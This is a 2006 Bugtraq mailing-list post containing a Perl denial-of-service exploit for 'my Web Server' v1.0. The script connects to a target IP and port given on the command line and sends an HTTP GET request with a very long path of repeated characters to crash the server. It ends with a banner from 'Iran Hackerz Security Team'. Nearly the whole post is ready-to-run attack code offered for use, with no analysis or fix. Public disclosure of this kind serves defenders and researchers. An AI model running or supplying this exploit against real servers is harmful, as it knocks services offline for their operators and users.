[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20060525133513.5802.qmail@securityfocus.com>
Date: 25 May 2006 13:35:13 -0000
From: s3rv3r_hack3r@...oo.com
To: bugtraq@...urityfocus.com
Subject: my Web Server << v-1.0 Denial of Service Exploit
#!/usr/bin/perl
#my Web Server << v-1.0 Denial of Service Exploit
#vendor : Eitsop.s5.com
use IO::Socket;
use strict;
my($socket) = "";
if($socket = IO::Socket::INET->new(
PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
print "++++++++++++++++++++++++++++++\n";
print "Connecting to $ARGV[0]:$ARGV[1] ...\n";
print "++++++++++++++++++++++++++++++\n";
print "Exploit Send successfuly!!\n";
print "++++++++++++++++++++++++++++++\n";
print $socket "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.0\r\n\r\n";
close($socket);
}
else
{
print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print " ___ ___ __ \n";
print " / | \_____ ____ | | __ ___________________ \n";
print "/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / \n";
print "\ Y // __ \\ \___| <\ ___/| | \// / \n";
print " \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ \n";
print " \/ \/ \/ \/ \/ \/ \n";
print " Iran Hackerz Security Team \n";
print " WebSite's: www.hackerz.ir & www.h4ckerz.com \n";
print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print "[Usage]perl myws.pl <IP> <Port> \n";
print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print "[Status]Can Not Connect To >> $ARGV[0]:$ARGV[1] \n";
print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
}
#EoF
Powered by blists - more mailing lists